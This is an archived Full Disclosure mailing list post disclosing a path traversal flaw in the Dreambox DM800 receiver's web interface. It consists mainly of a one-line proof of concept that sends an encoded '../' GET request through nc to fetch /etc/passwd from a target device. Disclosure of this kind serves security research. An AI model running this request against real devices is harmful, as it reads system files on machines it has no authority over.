Full Disclosure mailing list archives
Dreambox dm800 traversal path exploit
From: Neusbeer <neusbeer () gmail com>
Date: Mon, 09 Jan 2012 18:56:15 +0100
Dreambox DM800 traversal path exploit Dreambox DM800 suffers from traversal path exploit With standard GET command we can retreive /etc/passwd PoC: echo -e 'GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1\n\n' | nc <ip> 80 , Neusbeer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Dreambox dm800 traversal path exploit Neusbeer (Jan 09)